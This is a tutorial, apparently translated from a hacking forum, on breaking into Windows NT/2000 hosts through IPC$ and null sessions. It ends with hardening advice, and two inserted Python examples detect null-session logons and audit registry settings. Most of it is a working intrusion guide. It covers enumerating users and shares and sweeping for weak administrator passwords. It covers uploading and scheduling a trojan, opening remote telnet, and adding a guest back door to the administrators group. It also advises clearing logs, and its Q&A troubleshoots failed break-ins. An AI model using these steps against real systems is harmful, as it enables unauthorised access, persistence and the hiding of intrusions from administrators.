Table of contents:
I. Introduction
II. What is IPC$
III. What is a null session
IV. What a null session can do
V. Ports used by IPC$
VI. IPC$ connections in hack attacks
VII. Common reasons IPC$ connections fail
VIII. Reasons file copying fails
IX. How to open the target's IPC$ share and other shares
X. Commands that need a shell to complete
XI. Commands that may be used in an intrusion
XII. Complete IPC$ intrusion steps
XIII. How to prevent IPC$ intrusion
XIV. IPC$ intrusion Q&A
XV. Conclusion
I. Introduction
Articles about IPC$ intrusion are everywhere, and the attack steps have practically become a classic template, so nobody bothers to write about the topic anymore. Even so, I personally think those articles are not detailed enough, and they do not clear up the confusion of someone meeting IPC$ for the first time (just search any hack forum for IPC$ and see how many puzzled posts there are). So I consulted some material, tutorials and forum posts on the Internet and wrote this summary, hoping to clear up the questions that are easily confused so that people do not keep getting stuck in the same place.
Note: all situations discussed in this article are assumed to occur under NT/2000 by default. Win98 is not discussed. Because of the security improvements in Win XP, some operations do not apply to it; it will be discussed separately when there is an opportunity.
II. What is IPC$
IPC$ (Internet Process Connection) is a shared "named pipe" resource. It is a named pipe opened for inter-process communication: by supplying a trusted username and password, the two sides establish a secure channel and exchange encrypted data over it, which enables access to the remote computer. IPC$ is a new feature of NT/2000, and it allows only one connection between two IPs at any one time. Along with IPC$, NT/2000 also opens the default shares: all logical drives (C$, D$, E$ ...) and the system directory Winnt or Windows (admin$). Microsoft's original intention in all of this was to make management easier for administrators, but whether intended or not, it lowers the security of the system.
We often hear people talk about "the IPC$ vulnerability". In fact IPC$ is not a true vulnerability. I think people who say this must be referring to the "back door" Microsoft installed itself: the null session. So what is a null session?
III. What is a null session
Before introducing null sessions, we need to understand how a secure session is established. In Windows NT 4.0, a challenge-response protocol is used to establish a session with a remote machine. A successfully established session becomes a secure tunnel through which the two parties exchange information. The process runs roughly as follows:
1) The session requester (client) sends a packet to the session receiver (server), requesting the establishment of a secure tunnel;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, scrambles it with the password of the account trying to establish the session, and returns the result to the server (the response);
4) After receiving the response, the server passes it to the Local Security Authority (LSA), which verifies the response using the user's correct password to confirm the requester's identity. If the requester's account is a local account on the server, verification happens locally; if it is a domain account, the response is forwarded to the domain controller for verification. Once the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.
That is the rough process of establishing a secure session. So what is a null session?
A null session is a session established with the server without trust (that is, without supplying a username and password). According to the Win2000 access control model, establishing a null session still requires a token. But because no user information is authenticated while the null session is being established, the token contains no user information, and so the session does not let the systems exchange encrypted information. This does not mean the null session's token has no security identifier (SID, which identifies the user and the domain). For a null session, the SID of the token provided by the LSA is S-1-5-7. This is the SID of the null session, and its username is Anonymous Logon (this username can be seen in the user list but cannot be found in the SAM database). The access token contains the following groups: Everyone and Network. Within the limits of the security policy, the null session is authorized to access everything those two groups have the right to access. So what can be done once a null session is established?
IV. What can a null session do
On NT, under the default security settings, a null session can list the users and shares on the target host, access shares with Everyone permission, and access a small part of the registry; none of this has great value. On 2000 it is even less useful, because in Windows 2000 and later only administrators and backup operators may access the registry over the network by default, and doing so requires tools, which is inconvenient. From this we can see that such an untrusted session is of little use by itself. But within a complete IPC$ intrusion, the null session is an indispensable springboard, because we can obtain a user list from it, and for an experienced hacker that is already enough. The following are the specific commands that can be used in a null session:
1 First, establish a null session (the IPC$ share must of course be open on the target). Command: net use \\IP\ipc$ "" /user:"" Note: the command contains four spaces: one between net and use, one after use, and one on each side of the password.
2 View the shared resources of the remote host. Command: net view \\IP Explanation: after the null connection is established, this command shows the shared resources of the remote host. If it has shares open, you get a result similar to the following:
Shared resources at \\*.*.*.*
Share name   Type   Comment
-----------------------------------------------------------
NETLOGON     Disk   Logon server share
SYSVOL       Disk   Logon server share
The command completed successfully.
3 View the current time of the remote host. Command: net time \\IP Explanation: this command returns the remote host's current time.
4 Get the NetBIOS user name list of the remote host (your own NBT must be enabled). Command: nbtstat -A IP This command returns the remote host's NetBIOS user name list (your own NetBIOS support is required), with a result like the following:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name               Type         Status
---------------------------------------------
SERVER             <00> UNIQUE  Registered
OYAMANISHI-H       <00> GROUP   Registered
OYAMANISHI-H       <1C> GROUP   Registered
SERVER             <20> UNIQUE  Registered
OYAMANISHI-H       <1B> UNIQUE  Registered
OYAMANISHI-H       <1E> GROUP   Registered
SERVER             <03> UNIQUE  Registered
OYAMANISHI-H       <1D> UNIQUE  Registered
..__MSBROWSE__.    <01> GROUP   Registered
INet~Services      <1C> GROUP   Registered
IS~SERVER......    <00> UNIQUE  Registered
MAC Address = 00-50-8B-9A-2D-37
These are the things a null session is commonly used for, and it seems to yield quite a lot. But note that establishing an IPC$ connection leaves a record in the Event Log, whether or not the connection succeeds. Next, let's look at the ports IPC$ uses.
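From the defender's side, the Event Log record mentioned above can be searched for the null-session SID S-1-5-7. The following is an added example, not part of the original article. It assumes the Security log has been exported as one JSON object per line using the field names of the modern logon event 4624 (EventID, LogonType, TargetUserSid, IpAddress, TimeCreated); the sample events and the threshold are constructed.

```python
import json
from collections import defaultdict

ANONYMOUS_SID = "S-1-5-7"   # SID of the null-session token, as given in the article
LOGON_EVENT = 4624          # assumption: modern Windows "successful logon" event ID
NETWORK_LOGON = 3           # logon type used for connections to shares such as IPC$

# Constructed sample export, one JSON event per line (not real log data).
SAMPLE_EVENTS = """\
{"EventID": 4624, "TimeCreated": "2024-05-01T10:00:01Z", "LogonType": 3, "TargetUserSid": "S-1-5-7", "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "192.0.2.10"}
{"EventID": 4624, "TimeCreated": "2024-05-01T10:00:02Z", "LogonType": 3, "TargetUserSid": "S-1-5-21-1-2-3-1001", "TargetUserName": "alice", "IpAddress": "192.0.2.10"}
{"EventID": 4624, "TimeCreated": "2024-05-01T10:00:05Z", "LogonType": 3, "TargetUserSid": "S-1-5-7", "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "192.0.2.10"}
this line is truncated and is not valid JSON
{"EventID": 4634, "TimeCreated": "2024-05-01T10:00:06Z", "LogonType": 3, "TargetUserSid": "S-1-5-7", "TargetUserName": "ANONYMOUS LOGON"}
{"EventID": 4624, "TimeCreated": "2024-05-01T10:00:09Z", "LogonType": 3, "TargetUserSid": "S-1-5-7", "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "192.0.2.10"}
{"EventID": 4624, "TimeCreated": "2024-05-01T10:03:00Z", "LogonType": 3, "TargetUserSid": "S-1-5-7", "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "192.0.2.20"}
"""


def parse_events(text):
    """Parse JSON-lines text, skipping blank, malformed and non-object lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict):
            events.append(event)
    return events


def is_null_session(event):
    """True for a successful network logon made with the anonymous token.

    The SID is matched instead of the account name because the display
    name of Anonymous Logon is localized, while S-1-5-7 is constant.
    """
    return (
        event.get("EventID") == LOGON_EVENT
        and event.get("LogonType") == NETWORK_LOGON
        and event.get("TargetUserSid") == ANONYMOUS_SID
    )


def null_session_sources(events, threshold=3):
    """Return {source IP: sorted timestamps} for sources at or above threshold.

    A single anonymous logon is routine background noise on many networks,
    so only sources that repeat are reported.
    """
    by_ip = defaultdict(list)
    for event in events:
        if is_null_session(event):
            by_ip[event.get("IpAddress", "-")].append(event.get("TimeCreated", ""))
    return {ip: sorted(ts) for ip, ts in by_ip.items() if len(ts) >= threshold}


if __name__ == "__main__":
    for ip, stamps in null_session_sources(parse_events(SAMPLE_EVENTS)).items():
        print(f"{ip}: {len(stamps)} null-session logons, first at {stamps[0]}")
```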
V. Ports used by IPC$
First, some basic knowledge:
1 SMB (Server Message Block): a Windows protocol used for file and print sharing services;
2 NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS networking on top of TCP/IP;
3 In Windows NT, SMB is implemented on top of NBT. In Windows 2000, SMB can also be implemented directly over port 445, in addition to NBT.
With this background we can discuss which ports are chosen when accessing network shares.
For a Win2000 client:
1 If NBT is allowed when connecting to the server, the client tries ports 139 and 445 at the same time. If port 445 responds, it sends an RST packet to port 139 to drop that connection and carries the session over port 445. If port 445 does not respond, it uses port 139. If neither port responds, the session fails;
2 If NBT is disabled when connecting to the server, the client only tries port 445. If port 445 does not respond, the session fails. It follows that a Win2000 client with NBT disabled will fail against a server that offers SMB only over NBT, such as Windows NT.
For a Win2000 server:
1 If NBT is allowed, UDP ports 137 and 138 and TCP ports 139 and 445 are open;
2 If NBT is disabled, only port 445 is open.
The IPC$ sessions we establish follow the same rules. Obviously, if the remote server is not listening on port 139 or 445, an IPC$ session cannot be created.
VI. IPC$ connections in hack attacks
As mentioned above, even a null connection yields a lot of information (and that information is often essential). If you can log in as a user with certain permissions, you get the corresponding permissions, and obviously if you log in as an administrator, well, you can basically do whatever you want. But don't celebrate too early: the administrator's password is not so easy to get. Some careless administrators do use weak passwords, but they are a minority, and things are not what they used to be. As people's security awareness grows, administrators become more careful and their passwords harder to obtain. So most likely you will connect with minimal or even no permissions, and the host may not even have the IPC$ share open, in which case you cannot connect at all. You will gradually discover that IPC$ connections are not a cure-all, so don't expect every connection to succeed; that is unrealistic. A little discouraging? Not really. The key is to keep the right attitude: don't treat IPC$ intrusion as the ultimate weapon or think it is invincible. It is just one intrusion method; you may break through with it in one blow, or you may get nothing at all, and both are normal. In the hacker's world not every road leads to Rome, but there is always one road that does; look for it patiently!
VII. Common reasons IPC$ connections fail
Here are some common causes of IPC$ connection failure:
1 IPC connections are a feature unique to Windows NT and above. Because they rely on many DLL functions in Windows NT, they cannot run on Windows 9.x/ME. That is, only NT/2000/XP machines can establish IPC$ connections with each other; 98/ME cannot;
2 To create an IPC$ connection the other party must have the IPC$ share open. Even a null connection fails if the other party has closed the IPC$ share;
3 You have not started the LanmanWorkstation service. It provides network connections and communication, and without it you cannot initiate a connection request (display name: Workstation);
4 The other party has not started the LanmanServer service. It provides RPC support and file, print and named pipe sharing. IPC$ depends on this service, and without it the remote host will not respond to your connection request (display name: Server);
5 The other party has not started Netlogon, which supports pass-through authentication of account logons for computers on the network;
6 The other party has disabled NBT (that is, port 139 is not open);
7 The other party's firewall blocks ports 139 and 445;
8 Your username or password is wrong (obviously a null session rules out this error);
9 The command was entered incorrectly: there may be too many or too few spaces. When the username and password contain no spaces, the double quotes around them can be omitted; if the password is empty, type two quotes directly: ""
10 If the other party restarts the computer after the connection has been established, the IPC$ connection is dropped automatically and must be established again.
In addition, you can analyze the cause from the error number returned:
Error 5, access denied: most likely the user you are using does not have administrator privileges; raise your privileges first;
Error 51, Windows cannot find the network path: there is a network problem;
Error 53, the network path was not found: the IP address is wrong; the target is not powered on; the target's LanmanServer service is not started; the target has a firewall (port filtering);
Error 67, the network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted IPC$;
Error 1219, the supplied credentials conflict with an existing set of credentials: you have already established an IPC$ connection with the other party; delete it and connect again;
Error 1326, unknown user name or bad password: the reason is obvious;
Error 1792, an attempt was made to log on but the network logon service was not started: the target's NetLogon service is not started;
Error 2242, this user's password has expired: the target has an account policy that enforces regular password changes.
VIII. Reasons file copying fails
Some people establish an IPC$ connection successfully but then run into trouble at the copy step and cannot copy files. What are the common reasons?
1 Blind copying. This is the most frequent error, accounting for more than 50%. Many people do not even know whether the other party has a shared folder and copy blindly, and the result is failure and frustration. So I suggest always running net view \\IP before copying. Don't assume that a successful IPC$ connection means a shared folder exists.
2 Misjudging the default shares. This error is also common, and has two aspects:
1) Mistakenly believing that an established IPC$ connection means the default shares are open, and so copying files to a default share such as admin$ right after connecting. If the other party has not opened the default shares, the copy fails. A successful IPC$ connection only shows that the other party has the IPC$ share open. The IPC$ share and the default shares are two different things: the IPC$ share is a named pipe, not an actual folder, and the default shares are not a precondition for IPC$;
2) Because net view \\IP does not display default shares (their names carry a $), it cannot tell you whether the other party has default shares open. If they are not open, every operation on a default share fails. (Most scanning software sweeps the default shared directories while sweeping passwords, which avoids this error.)
3 Insufficient user privileges, covering four scenarios:
1) With a null connection, operations on all shares (default and ordinary) mostly fail for lack of permission;
2) Copying to a default share requires administrator privileges;
3) Copying to an ordinary share requires the corresponding permission (that is, the access rights set by the other party);
4) The other party can block external access to shares with a firewall or security software.
One more point: don't assume that the account named Administrator is an administrator; the administrator name can be changed.
4 Killed by the firewall, or the target is inside a LAN. The copy may have succeeded, but the file is killed by the firewall when run remotely, so the file cannot be found; or you may have copied the Trojan to a host inside a LAN, so the connection fails. So take care when copying, otherwise you will have to give up.
As everyone can see, IPC$ connections run into all sorts of problems in practice. The above summarizes only some common mistakes; the ones I have not mentioned you will have to work out yourselves.
IX. How to open the target's IPC$ share and other shares
The target's IPC$ is not easy to open, otherwise the world would be in chaos. You need a shell with admin privileges, such as telnet or a Trojan, and then run net share ipc$ in it to open the target's IPC$; net share ipc$ /del closes the share. To open a shared folder, you can use net share baby=c:\ which shares its C drive under the share name baby.
X. Commands that need a shell to complete
Many tutorials are imprecise on this point: some commands that can only be completed from a shell are presented without saying so, which is misleading. So here is a summary of the operations that must be done from a shell:
1 Creating a user on the remote host, activating a user, changing a user's password, and adding a user to the administrators group must be done from a shell;
2 Opening the remote host's IPC$ share, default shares, or ordinary shares must be done from a shell;
3 Starting or stopping services on the remote host must be done from a shell;
4 Starting or killing processes on the remote host must also be done from a shell.
XI. Commands that may be used in an intrusion
Note whether each command applies to the local or the remote host. If it applies locally, you can run it against the remote host only after you have a shell on that host.
1 Create a null connection: net use \\IP\ipc$ "" /user:""
2 Create a non-null connection: net use \\IP\ipc$ "psw" /user:"account"
3 View the remote host's shared resources (default shares are not shown): net view \\IP
4 View the local host's shared resources (local default shares are shown): net share
5 Get the remote host's user name list: nbtstat -A IP
6 Get the local host's user list: net user
7 View the remote host's current time: net time \\IP
8 Display the local host's running services: net start
9 Start/stop a local service: net start servicename /y and net stop servicename /y
10 Map a remote share: net use z: \\IP\baby This maps the shared resource named baby to drive Z
11 Delete a share mapping: net use c: /del deletes the mapped C drive, and likewise for other drives; net use * /del /y deletes all mappings
12 Copy a file to the remote host: copy path\srv.exe \\IP\shared directory name, for example: copy ccbirds.exe \\*.*.*.*\c copies the file in the current directory to the other party's C drive
13 Add a scheduled task remotely: at \\IP time program name, for example: at \\127.0.0.0 11:00 love.exe Note: the time uses 24-hour format. If the program is in the system default search path (such as system32\), no path is needed; otherwise you must give the full path
14 Open telnet on the remote host. This uses a small program, opentelnet.exe, available on all the download sites, and four requirements must be met:
1) the target has the IPC$ share open
2) you have an administrator account and password
3) the target has the RemoteRegistry service running
4) it works against Win2K/XP; NT is untested
Command format: opentelnet.exe \\server account psw NTLM-authentication-mode port
Example: C:\>opentelnet.exe \\*.*.*.* administrator "" 1 90
15 Activate a user / add a user to the administrators group:
1 net user account /active:yes
2 net localgroup administrators account /add
16 Close telnet on the remote host. This also needs a small program, ResumeTelnet.exe. Command format: ResumeTelnet.exe \\server account psw Example: C:\>resumetelnet.exe \\*.*.*.* administrator ""
17 Delete an established IPC$ connection: net use \\IP\ipc$ /del
XII. Complete IPC$ intrusion steps
In fact the intrusion steps vary with personal preference. I will describe the common ones; pardon my clumsiness!
1 Search for hosts with scanning software such as Stream, SSS or X-Scan, whichever you prefer, then lock onto a target. If you sweep up a password with administrator privileges, you can go on to the following steps. Suppose the Administrator password you obtained is empty.
2 At this point you have two roads to choose from: open telnet on it (command line), or give it a Trojan (graphical interface). Let's take the telnet road first.
3 You haven't forgotten the command for opening telnet, have you? It uses the small program opentelnet: C:\>opentelnet.exe \\192.168.21.* administrator "" 1 90 If it returns the following information:
*******************************************************
Remote Telnet Configure, by RefDom
Email: refDom@263.net
OpenTelnet.exe
Usage: OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!! The Telnet Service default setting: NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!! Yeah!! Telnet Port is 90. You can try: "telnet ip 90", to connect the server!
Disconnecting server...Successfully!
* This means you have opened telnet on port 90.
4 Now we telnet in: telnet 192.168.21.* 90 If it succeeds, you get a shell on the remote host, and at this point you can control your "broiler" (the compromised machine) as if it were your own. What to do with it? Add guest to the administrators group, which counts as leaving a back door.
5 C:\>net user guest /active:yes * Activates the guest user. The guest may well be active already; you can use net user guest to check whether "Account active" is Yes or No.
6 C:\>net user guest 1234 * Changes the guest password to 1234, or to whatever password you like.
7 C:\>net localgroup administrators guest /add * Makes guest an administrator, so that even if the administrator changes his password we can still log in as guest. A reminder, though: the security policy settings may prohibit remote access by guest and similar accounts. If so, our back door is useless. May God bless everyone.
8 OK, now let's take the other road and give it a Trojan to play with.
9 First, establish the IPC$ connection: C:\>net use \\192.168.21.*\ipc$ "" /user:administrator
10 Since we want to upload something, we must first know which shares it has open: C:\>net view \\192.168.21.*
Shared resources at \\192.168.21.*
Share name   Type   Comment
-----------------------------------------------------------
C            Disk
D            Disk
The command completed successfully.
* Good, we can see that the other party shares drives C and D, so we can copy files to either drive. Once again: default shares cannot be seen with the net view command, so we cannot tell whether the other party has default shares open.
11 C:\>copy love.exe \\192.168.21.*\c 1 file copied. * This command transfers the Trojan client love.exe to the other party's C drive. Of course, copying it into the system folder would be best, since it is less easily discovered there.
12 Before running the Trojan, check the target's current time: net time \\192.168.21.* The current time at \\192.168.21.* is 2003/8/22 11:00 AM. The command completed successfully.
13 Now we run it with at, but the other party must have the Task Scheduler service running (it lets programs run at a specified time), otherwise this will not work: C:\>at \\192.168.21.* 11:02 c:\love.exe Added a new job with job ID = 1
14 All that is left is to wait. At 11:02 you can try connecting with the control terminal; if it succeeds, you will be able to control the remote host through a graphical interface. If the connection fails, the target may be inside a LAN, the program may have been killed by the firewall, or the host may have gone offline (surely not that much of a coincidence). Whatever the case, you have to give up.
Well, those are the two basic methods. Once you are familiar with them you can use more efficient routines, such as cloning guest with CA, running the Trojan with psexec, or getting a shell directly with the command psexec \\tergetIP -u user -p paswd cmd.exe and so on. All of these work; it is up to you. But don't forget to clean the logs afterwards; you can use Elsave.exe from Gongge. Having described IPC$ intrusion, we cannot leave out how to prevent it. So how do you defend against it? Read on.
XIII. How to prevent IPC$ intrusion
1 Prohibit enumeration over null connections (this does not block the establishment of null connections)
Method 1: Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and change the value RestrictAnonymous (DWORD) to 1. When set to 1, an anonymous user can still connect to the IPC$ share, but is restricted from listing information such as SAM accounts and shares over that connection. Windows 2000 adds the value 2, which restricts all anonymous access unless explicitly authorized. Setting it to 2 may cause other problems, so 1 is recommended. If the value mentioned above does not exist, create it.
Method 2: Local Security Settings - Local Policies - Security Options - make the corresponding setting under 'Additional restrictions for anonymous connections'.
2 Prohibit the default shares
1) View local shared resources: Run - cmd - enter net share
2) Delete the shares (the default shares come back after a restart):
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (continue for e, f, ... if present)
3) Stop the Server service: net stop server /y (the shares reopen when the Server service is started again)
4) Prevent the default shares from opening automatically (this does not close the IPC$ share): Run - regedit
Server edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value AutoShareServer (DWORD) to 00000000.
Pro edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value AutoShareWks (DWORD) to 00000000.
If the value mentioned above does not exist, create it (right-click - New - DWORD value) and then set it. These two values do not exist on a host by default and must be added manually.
3 Turn off the service that IPC$ and the default shares depend on, the Server service: Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - select Disabled. A prompt may appear saying that some XXX service will also be stopped and asking whether to continue. This is because some secondary services depend on LanmanServer; ignore it.
4 Block ports 139 and 445. Without these two ports an IPC$ connection cannot be established, so blocking ports 139 and 445 also prevents IPC$ intrusion.
1) Port 139 can be blocked by disabling NBT: Local Area Connection - TCP/IP Properties - Advanced - WINS - select 'Disable NetBIOS over TCP/IP'
2) Port 445 can be blocked by modifying the registry. Hive: HKEY_LOCAL_MACHINE, key: System\CurrentControlSet\Services\NetBT\Parameters, name: SMBDeviceEnabled, value: 0. Reboot the machine after the change.
Note: if you block these two ports, you will not be able to use IPC$ to intrude on others either.
3) Install a firewall and filter the ports
5 Set complex passwords so that the password cannot be brute-forced through IPC$.
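The registry settings recommended in this section can be checked offline against a registry export. The following is an added example, not part of the original article. It assumes the export has already been decoded to text in regedit's .reg format (real exports are usually UTF-16); both sample exports are constructed, and the function names are hypothetical.

```python
import re

LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LANMAN = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
NETBT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters"

SECTION = re.compile(r"^\[(.+)\]$")
DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

# Constructed sample: anonymous enumeration allowed, port 445 setting absent.
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000000
"""

# Constructed sample: a Pro edition host configured as the article recommends.
HARDENED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareWks"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"SMBDeviceEnabled"=dword:00000000
"""


def parse_reg(text):
    """Return {(key, value name): int} for every DWORD value in a .reg export.

    Registry key and value names are case-insensitive, so both are lowercased.
    """
    values, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        section = SECTION.match(line)
        if section:
            key = section.group(1).lower()
            continue
        dword = DWORD.match(line)
        if dword and key is not None:
            values[(key, dword.group(1).lower())] = int(dword.group(2), 16)
    return values


def checks_for(edition):
    """The article's settings; the AutoShare value name depends on the edition."""
    autoshare = "AutoShareServer" if edition == "server" else "AutoShareWks"
    return [
        (LSA, "RestrictAnonymous", lambda v: v >= 1, "1"),
        (LANMAN, autoshare, lambda v: v == 0, "0"),
        (NETBT, "SMBDeviceEnabled", lambda v: v == 0, "0"),
    ]


def audit(text, edition="server"):
    """Return one finding per setting that is missing or differs from the article.

    A missing value counts as a finding: the article notes that the
    AutoShare values do not exist by default and must be added manually.
    """
    values = parse_reg(text)
    findings = []
    for key, name, is_ok, wanted in checks_for(edition):
        actual = values.get((key.lower(), name.lower()))
        if actual is None:
            findings.append(f"{name}: not set (article recommends {wanted})")
        elif not is_ok(actual):
            findings.append(f"{name}: {actual} (article recommends {wanted})")
    return findings


if __name__ == "__main__":
    for finding in audit(WEAK_EXPORT, "server"):
        print(finding)
```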
XIV. IPC$ intrusion Q&A
A lot of theory has been covered above, but in practice you will run into all kinds of questions. To give everyone as much help as possible, I went through several security forums, read a great many posts, and picked out some representative questions and answers. Some of the answers are mine and some are replies from the forums. If there are omissions or mistakes, please bear with me.
1. An IPC$ intrusion leaves a record on the server. Is there any way to keep the server from finding out?
A: A record is certainly left. You can delete it with a program, or intrude through a broiler.
2. Look at the situation below: I can connect but cannot copy. net use \\***.***.***.***\ipc$ "password" /user:"username" The command completed successfully. copy icmd.exe \\***.***.***.***\admin$ The network path cannot be found.
A: There are two possible reasons:
1) Your permissions are not enough, so you cannot access the default shares;
2) The other party has not opened the admin$ default share. Don't assume that because IPC$ connects, the other party must have default shares (many people think so!!). In that case you can try other default shares or ordinary shares, such as c$, d$, c, d, etc. If that still fails, look at your permissions. If you have administrator privileges, you can open telnet; if that succeeds, you can then open it.
3. The other party has IPC$ open and I can establish a null connection, but when I open the C or D drive it asks for a password. I know a null connection does not have much permission, but is there nothing else I can do?
A: I suggest guessing the password with Stream or another tool. If you cannot guess it, you can only give up; after all, what a null connection can do is limited.
4. I have already guessed the administrator's password and connected with IPC$ successfully, but net view \\IP shows that the default shares are not open. What should I do?
A: First, a correction: net view cannot show default shares. Since you now have administrator privileges and the other party has IPC$ open, I suggest opening its telnet with opentelnet.exe. Once you have that shell, you can do anything.
5. After connecting with IPC$ successfully, I used the following command to create an account, but found the account on my own machine. What is going on? net user ccbirds /add
A: Establishing IPC$ only shows that you have a communication tunnel to the remote host; it does not mean you have a shell. You can create an account remotely only after getting a shell. Otherwise your operation only takes effect locally.
6. I have got into a broiler with an administrator account and can see its system time, but I cannot copy programs onto the machine. Every time it says "Access denied, 0 files copied". Has the other party set up some service? What should I do?
A: You cannot copy files. Besides insufficient permissions, it may be that the other party has closed c$, d$ and the other default administrative shares, or that the other party uses the NTFS file format. Through its settings, even an administrator may not be able to write files remotely. Since you have administrator privileges, open telnet first, then open it.
7. Can I use Win98 to establish an IPC$ connection to the other party?
A: No. For IPC$ operations, Win2000 is recommended.
8. I successfully established a null connection with net use \\IP\ipc$ "" /user:"", but I cannot export the user list with nbtstat -a ip. Why?
A: By default a null connection can export the user list, but if the administrator has disabled exporting the list by modifying the registry, you get the situation you describe; or your own NBT is not enabled, since netstat is built on top of NBT.
9. When I establish IPC$ I get the following message: 'The supplied credentials conflict with an existing set of credentials'. What is going on?
A: Oh, this shows that you have established more than one IPC$ connection with the target host, which is not allowed. Delete the others: net use \\*.*.*.*\ipc$ /del
10. This appears when I map a drive: F:\>net use h: \\211.161.134.*\e$ System error 85 has occurred. The local device name is already in use. What is going on?
A: You are too careless. This shows that your H drive is already in use; map to another drive letter!
11. I established a connection with f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" successfully, but when I map a drive it asks for a password. What happened? F:\>net use h: \\*.*.*.*\c$ The password is invalid for \\*.*.*.*\c$. Type the password for \\*.*.*.*\c$: System error 5 has occurred. Access is denied.
A: Heh, being asked for a password shows that your current user's permissions are not enough to map the default share c$. Find a way to raise your privileges or find the administrator's weak password! Default shares generally require administrator privileges.
12. I used SuperScan and found a host with port 139 open, but why can't I establish a null connection?
A: You have confused the relationship between IPC$ and port 139. A host that accepts IPC$ connections must have port 139 or 445 open, but a host with those ports open does not necessarily accept a null connection, because the other party can turn off the IPC$ share.
13. Most of the machines near me run XP. Using Stream I scanned several with an empty Administrator password, and I can connect, but I cannot copy anything; it says error 5. Why?
A: XP has higher security. In the default security policy settings, when a local account is authenticated over the network it gets guest rights by default, so even if you log in remotely as the administrator you only have guest rights. So when you copy a file you of course get error 5: insufficient permissions.
14. I used net use \\192.168.0.2\ipc$ "password" /user:"administrator" successfully, but net use i: \\192.168.0.2\c asks me to type the password for \\192.168.0.2. What is going on?
A: Although you have administrator privileges, the administrator may not have allowed administrator access when setting the share-level permissions on the C drive, hence the problem.
15. If my own machine has IPC$ disabled, can I still use IPC to connect to other machines?
A: Yes.